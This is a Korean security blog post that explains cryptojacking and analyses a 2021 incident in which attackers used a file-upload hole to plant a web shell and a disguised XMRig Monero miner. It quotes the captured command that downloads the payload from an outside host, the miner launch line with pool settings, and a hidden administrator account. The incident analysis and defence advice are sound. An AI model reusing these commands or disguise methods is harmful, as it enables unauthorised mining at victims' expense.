크립토 재킹 / cryptojacking 이란?
크립토재킹(Cryptojacking)은 피해자의 PC 및 모바일 기기 감염을 통해 암호화폐를 채굴 하기 위한 공격
가장 많이 알려진 악성코드로는 암호화폐 모네로 채굴에 사용되는 악성코드
암호화폐 채굴 악성코드에 감염되면 감염 서버나 PC의 CPU 자원을 99% 까지 사용
비정상적인 루트나 불법으로 채굴코드를 설치하여 감염 device의 리소스 자원을 사용하여
해커는 불법으로 이득을 취할수 있으며,
피해자 입장에서는 과다한 리소스 사용으로 예를들자면 전기 요금이 상승하여 금전적인
피해가 발생할수 있으며, 서비스 운영적인 측면에서도 속도가 느려진다 거나 이외
다양한 불이익이 발생할수 있다.
요즘은 고도화 되어 CPU 사용량 많으로는 감염 사실을 알아차리기 힘듬
공격 벡터
대표적인 채굴코드 감염 루트는
악성링크를 삽입하여 악성 이메일 대량 자동발송으로 감염
웹페이지 내 악성 스크립트를 삽입하여 웹페이지 접속 유도를 하여 감염
다양한 공격벡터가 존재하지만 실제 사례를 토대로 포스팅 합니다.
침해 사고 피해 사례
발견된 보안홀 (공격벡터)
웹서비스내 이미지 업로드 페이지의 파일 업로드 취약점을 악용한 채굴코드(악성코드) 설치 감염
악성 웹쉘을 업로드 후 원격에서 OS 권한 탈취 및 외부로부터 채굴코드(악성코드) 다운로드 후 설치
채굴 코드 설치 및 서버 자원을 사용하여 가상화폐 채굴등 비정상 행위를 진행한것으로 확인
상세 분석
APT 보안 장비 탐지 로그 일부
탐지명 MINER - TCP (Request)
March 15th 2021, 16:52:57.819 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:36:55.084 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:31:50.083 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:26:47.858 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:16:20.092 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:14:07.859 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:06:45.084 DDI 59.2x.xx 0x.xx.252.86 443 MINER - TCP (Request) March 15th 2021, 16:06:05.079 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:04:25.084 DDI 1.24x.xx 6x.xx.199.18 443 MINER - TCP (Request)
통신 패킷 분석 내용 일부
해외 xx.xx.39.1x8 로 부터 채굴 코드 다운로드 및 monero coin 관련 통신 패킷
c:\Users\Public\Libraries\get.exe -O c:\Users\Public\Libraries\lsass.exe http://2xx.xx5.x9.1x8/6722/lsass.exe c:\Users\Public\Libraries\get.exe -O c:\Users\Public\Libraries\lsass.exe http://2xx.xx5.x9.1x8/6722/lsass.exe c:\Users\Public\Libraries\lsass.exe --donate-level 1 -o x0.oxxxxx.com:53 -u feng -o xx.xxxxzo.com:443 -u feng --coin monero -k --tls -t 4
암호화폐 전송 패킷 -> doxxxxx.sxxl.xmrig.com
{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"3876d8b9b4cb4d7e6b9864209fxxxxxxxxxxxxxx87","pass":"x","agent":"XMRig/6.7.2 (Windows NT 6.3; Win64; x64) libuv/1.40.0 msvc/2019","url":"stratum+ssl://doxxxxx.sxxl.xmrig.com:443","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","cn/1","rx/wow","rx/arq","rx/sfx","rx/keva","xxxxgon2/chukwa","xxxgon2/chukwav2","xxxon2/wrkz","asxxxxxxwt"]}}
피해 서버 분석
특정 프로세스(config.exe, lsass.exe 이외 다수) -> 해외 모네로 monero coin 채굴사이트 암호화폐 전송
c:\Users\Public\Libraries\lsass.exe 악성코드
c:\windows\Fonts\config.exe 채굴코드
config.json 채굴 악성코드 일부
"cpu": { "enabled": true, "huge-pages": true, "huge-pages-jit": false, "hw-aes": null, "priority": null, "memory-pool": false, "yield": true, "asm": true, "argon2-impl": null, "astrobwt-max-size": 550, "astrobwt-avx2": false, "argon2": [0, 1, 2, 3], "astrobwt": [0, 1, 2, 3], "cn": [ [1, 0], [1, 1], [1, 2], [1, 3] ], "cn-heavy": [ [1, 0], [1, 1] ], "cn-lite": [ [1, 0], [1, 1], [1, 2], [1, 3] ], "cn-pico": [ [2, 0], [2, 1], [2, 2], [2, 3] ], "cn/gpu": [0, 2], "rx": [0, 2], "rx/wow": [0, 2], "cn/0": false, "cn-lite/0": false, "rx/arq": "rx/wow", "rx/keva": "rx/wow" },
windows OS 계정 생성 흔적
administrator group / user name "a" 계정 생성
탐지 및 대응방안
1) 침해 사고와 관련된 IP주소 차단 및 지속 모니터링
2) 이미지 업로드 페이지 / 파일 업로드 취약점 시큐어 코딩 보완조치 공격 벡터 차단
해킹 사고 사례 더보기
'SECURITY/해킹사고 사례' 카테고리의 글 목록
정보 지식 공유와 나눔으로 상생의 가치 실현해요 ^^
rootkey.tistory.com
기타 대응 방안
[하기 내용 출처 이글루시큐리티]
1) 웹 필터링 도구 사용 및 광고 차단 프로그램 사용
대부분의 크립토재킹 공격이 웹 페이지를 통해 이루어지기 때문에 사용자들은 웹 페이지 사용 중 이상징후 발생 시 즉시 페이지를 종료하고 URL을 확인하여 웹 필터를 업데이트해 스크립트를 차단하여야 한다.
2) 광고 차단프로그램 사용
비교적 보안이 취약한 광고페이지의 경우 공격자가 자주 이용하는 공격 포인트가 되기 때문에 광고 차단 프로그램 설치 시 효과적인 예방이 가능하다. 일부 광고 차단 프로그램의 경우 악성 스크립트를 탐지할 수 있는 기능이 존재하며, 탐지 및 차단까지 가능한 안티마이너, 마이너블록 등 다양한 확장 프로그램이 존재한다.
3) 확장 프로그램 관리
일부 크립토재킹 악성코드의 경우 취약한 브라우저 확장프로그램을 사용하거나 정상적인 확장자를 감염시키는 경우도 존재하기 때문에 설치된 모든 확장 프로그램을 확인하여 최신 업데이트를 진행하고 필요하지 않은 기능은 제거하는 것이 필요하다.
4) 내부자 보안교육
대부분의 악성코드가 피싱 형태로 유포되기 때문에 내부자 보안교육을 통해 예방할 수 있다. 의심스러운 메일, 웹사이트 스푸핑 같은 피싱 기술들을 직원에게 교육하여 크립토재킹 및 다른 공격에 대비하는 것이 중요하다.
비록 암호화폐의 가치가 2018년 이후 계속 하락하고 있지만 암호화폐의 관심은 지속적으로 이어지고 있다. 2017년 발생한 ‘워너크라이’사태 이후 급증한 암호화폐 가치 및 크립토재킹 공격 빈도 증가로 보아 이후 다른 이슈가 발생하면 다시한번 암호화폐의 가치가 증가하며 크립토재킹 공격 또한 많아질 것으로 판단된다.
